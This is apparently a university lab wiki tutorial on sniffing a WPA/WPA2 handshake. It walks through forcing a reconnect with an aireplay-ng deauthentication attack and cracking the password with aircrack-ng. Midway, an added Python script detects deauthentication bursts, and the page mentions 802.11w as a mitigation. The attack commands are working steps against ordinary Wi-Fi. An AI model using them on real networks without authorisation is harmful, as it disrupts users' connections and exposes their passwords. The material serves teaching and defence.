WPA/WPA2 PSK deauthentication attack

From Embedded Lab Vienna for IoT & Security
Revision as of 18:57, 17 February 2020 by Ikramer (talk | contribs) (How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.)

Summary

How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.

Requirements and Tools

  • Operating system: Ubuntu 18.04 bionic amd64
  • Aircrack-ng

Description

Put your interface in monitor mode

  • Use airmon-ng to list the wireless interface, its driver and chipset:
  airmon-ng
     PHY	Interface	Driver		Chipset
     phy0	wlan0		iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • Before the interface can be put in monitor mode, remove the managed interface with `iw wlan0 del` and run airmon-ng again; answer y when it offers to assign a new interface to phy0:
  airmon-ng
  Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y
     PHY	Interface	Driver		Chipset
     phy0	wlan0mon	iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • Kill all processes which use the physical device (wpa_supplicant, NetworkManager), otherwise they keep changing the channel behind your back:
  airmon-ng check kill
  Killing these processes:
     PID Name
     895 wpa_supplican
  • Start monitor mode on the new interface, fixed to channel 9:
  airmon-ng start wlan0mon 9


Check needed MAC addresses

  • Use Wireshark or airodump-ng to list the access points and the clients associated with them:
  airodump-ng wlan0mon
  • You will need:
    • BSSID (MAC address of the access point): <bssid>
    • Access point channel: <channel>
    • MAC address of a victim, i.e. a wireless client connected to the access point using WPA2

Capture handshake

  • Capture the traffic of the target access point on its channel and write it to files prefixed with psk; the 4-way handshake of any station that (re)connects is recorded in the capture:
  airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon

If no handshake is captured, you need the MAC address of a victim (an already connected client) and have to deauthenticate it, so that it reconnects and performs the handshake again while airodump-ng is listening.

  • Deauthenticate using aireplay-ng:
  aireplay-ng -0 1 -a <bssid> -c <victim mac address> wlan0mon

  Options:
    • -0: deauthentication attack
    • 1: number of deauthentications to send
    • -a <bssid>: MAC address of the access point
    • -c <victim mac address>: MAC address of the client to deauthenticate

  • Examine the captured handshake in Wireshark with the display filter eapol; airodump-ng also shows "WPA handshake: <bssid>" in its status line once it has recorded one.
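From the defender's side, the attack above is visible on the air as a burst of deauthentication (or disassociation) management frames carrying the access point's address as sender, which a real AP only emits occasionally and one at a time. The following Python script is an added example, not part of the original wiki page or of the aircrack-ng project: it parses the fixed 802.11 management header (frame control, three addresses, reason code) from raw frame bytes and raises an alert when one sender/BSSID pair emits more than a threshold of deauth/disassoc frames within a short window, the core heuristic of a wireless IDS rule for this attack. The MAC addresses, timestamps and frames are constructed inline for offline testing; the threshold and window values are assumptions to tune per site. The durable mitigation is Protected Management Frames (802.11w), which authenticates deauthentication frames so that forged ones are discarded by the client.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame control, first byte: subtype (4 bits) | type (2 bits) | version (2 bits).
# Management type is 0; subtype 12 = deauthentication, subtype 10 = disassociation.
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
MGMT_HDR_LEN = 24  # FC(2) + duration(2) + addr1(6) + addr2(6) + addr3(6) + seq ctrl(2)


def mac_str(raw: bytes) -> str:
    """Render six raw bytes as a colon separated MAC address."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(raw: bytes):
    """Parse the fixed header of an 802.11 management frame.

    Returns a dict with subtype, addresses and (for deauth/disassoc) the reason
    code, or None for frames that are too short or not management frames.
    """
    if len(raw) < MGMT_HDR_LEN:
        return None
    fc0 = raw[0]
    if (fc0 >> 2) & 0x3 != 0:  # type field must be 0 (management)
        return None
    subtype = fc0 >> 4
    info = {
        "subtype": subtype,
        "dst": mac_str(raw[4:10]),    # addr1: receiver
        "src": mac_str(raw[10:16]),   # addr2: transmitter (spoofed by the attacker)
        "bssid": mac_str(raw[16:22]), # addr3: BSSID
        "reason": None,
    }
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        if len(raw) < MGMT_HDR_LEN + 2:
            return None
        info["reason"] = struct.unpack_from("<H", raw, MGMT_HDR_LEN)[0]
    return info


def detect_deauth_bursts(records, threshold=5, window=2.0):
    """Sliding-window detector over (timestamp_seconds, raw_frame) pairs in time order.

    Alerts once per (src, bssid) pair that sends at least `threshold`
    deauth/disassoc frames within any `window` seconds (assumed defaults).
    """
    recent = defaultdict(deque)
    flagged = set()
    alerts = []
    for ts, raw in records:
        frame = parse_mgmt_frame(raw)
        if frame is None or frame["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        key = (frame["src"], frame["bssid"])
        seen = recent[key]
        seen.append(ts)
        while seen and ts - seen[0] > window:  # drop frames outside the window
            seen.popleft()
        if len(seen) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append({"src": key[0], "bssid": key[1], "count": len(seen),
                           "first": seen[0], "last": ts, "reason": frame["reason"]})
    return alerts


def _sample_deauth(dst: str, src: str, bssid: str, reason: int = 7) -> bytes:
    """Constructed sample deauthentication frame, built in memory only for the test input."""
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    fc = struct.pack("<H", SUBTYPE_DEAUTH << 4)  # byte 0 = 0xC0, byte 1 = 0x00
    return (fc + b"\x3a\x01" + hexmac(dst) + hexmac(src) + hexmac(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))


AP = "00:11:22:33:44:55"      # constructed access point address
CLIENT = "66:77:88:99:aa:bb"  # constructed client address


def sample_records():
    """Constructed capture: one legitimate deauth, a data frame, then a spoofed burst."""
    records = [(0.0, _sample_deauth(CLIENT, AP, AP, reason=3))]
    records.append((5.0, b"\x08" + b"\x00" * 30))  # data frame (type 2), ignored
    for ts in (10.0, 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7):
        records.append((ts, _sample_deauth(CLIENT, AP, AP)))  # attacker spoofing the AP
    return records


if __name__ == "__main__":
    for alert in detect_deauth_bursts(sample_records()):
        print(f"deauth burst: {alert['count']} frames from {alert['src']} "
              f"(BSSID {alert['bssid']}) between t={alert['first']} and t={alert['last']}")
```

The single deauthentication at t=0 does not trigger the rule, which is the point of the window: a normal AP does deauthenticate clients now and then, while the attack shows up as a tight burst. Feeding real traffic requires stripping the radiotap header from each captured frame before calling parse_mgmt_frame.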

Crack with aircrack-ng

  • Run a dictionary attack against the captured handshake (the psk*.cap files written by airodump-ng):
  aircrack-ng -w <passwordlist path> -b <bssid> psk*.cap

Reset

Do not forget to turn off monitor mode and restart the network manager, otherwise the notebook has no network connection afterwards.

  • Stop monitor mode
  airmon-ng stop wlan0mon
  • Restart the network manager for internet access
  service network-manager restart


Used Hardware

Notebook with Wifi interface card

Courses

References